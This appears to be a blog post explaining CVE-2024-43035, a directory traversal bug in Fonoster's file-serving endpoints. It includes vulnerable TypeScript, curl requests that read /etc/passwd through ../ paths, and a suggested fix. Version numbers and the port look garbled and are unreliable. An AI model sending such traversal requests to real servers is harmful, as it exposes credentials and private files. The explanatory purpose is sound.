Summary:
CVE-2024-43035 is a critical directory traversal vulnerability discovered in Fonoster, a voice applications platform, affecting version .5.5 up to (but not including) .6.1. Attackers can use this bug to read any files on the server that the Fonoster service can access, simply by crafting special HTTP requests. This vulnerability is found in the serveFiles function inside mods/voice/src/utils.ts, which is missing in version .6.1 (fixed).
This post will break down how this bug happens, show you simple proof-of-concept (PoC) exploit code, point you to the original references, and help you understand how a real-world attack works in plain English.
What is Directory Traversal?
Directory traversal (also called path traversal) lets an attacker move outside the intended directory and access files elsewhere on the system. This is generally done using ../ in a file path.
For example, requesting /sounds/../../../../etc/passwd might give an attacker access to sensitive UNIX password files, if the application server is vulnerable.
How Does CVE-2024-43035 Affect Fonoster?
Fonoster versions .5.5 before .6.1 have a bug where they serve files based on user-provided filenames, without blocking ../ traversal. The bug lies in endpoints:
- /sounds/:file
- /tts/:file
The handler is the serveFiles function in mods/voice/src/utils.ts. Attackers can supply filenames like ../../../../etc/passwd to read any file on the disk.
Here’s a simplified example of the vulnerable logic in serveFiles (from .5.5)
// Vulnerable serveFiles snippet (simplified)
import * as fs from "fs";
import path from "path";
export function serveFiles(directory: string) {
return (req, res) => {
const file = req.params.file;
const filePath = path.join(directory, file); // No path validation!
if (fs.existsSync(filePath)) {
res.sendFile(filePath);
} else {
res.status(404).send("File not found");
}
}
}
What's wrong here?
The code uses path.join() to combine the directory and user-supplied file parameter, but it doesn’t check for ../. A user can supply a "file" value like ../../../some/secret/file.txt and the function will serve that file if it exists.
In version .6.1, this serveFiles utility does not exist—meaning the bug was fixed by removing the vulnerable function and endpoint.
👉 See the GitHub diff (compare) from .5.5 to .6.1
Original NVD entry: CVE-2024-43035
Proof-of-Concept Exploit (PoC)
Let’s try to access the server’s /etc/passwd file (classic LINUX target) using a vulnerable Fonoster instance running at http://localhost:300.
curl 'http://localhost:300/sounds/../../../../etc/passwd'
or
curl 'http://localhost:300/tts/../../../../etc/passwd'
What you’ll get:
The server will reply with the full contents of /etc/passwd if it exists and the Fonoster process can read it.
> TIP:
> You can use more or fewer ../ depending on where your sound files directory is rooted.
Real-World Attack Impact
- Sensitive File Leaks: Attackers can read config files, SSH keys, source code, or database credentials.
- Reconnaissance: Directory listings may sometimes be possible, allowing attackers to explore the filesystem.
- Chained Attacks: If attackers read service credentials, they may take over the Fonoster instance entirely.
`typescript
// Example safe join
function safeJoin(base: string, target: string) {
const targetPath = path.posix.normalize('/' + target);
return path.join(base, targetPath);
}
References
- Fonoster GitHub releases
- CVE-2024-43035 NVD page
- Compare Fonoster .5.5 and .6.1
- OWASP Path Traversal Cheat Sheet
Conclusion
CVE-2024-43035 in Fonoster shows how missing input sanitization can put an entire service at risk. Upgrade now and always validate user file paths before using them server-side!
Timeline
Published on: 03/05/2026 00:00:00 UTC
Last modified on: 03/05/2026 20:16:09 UTC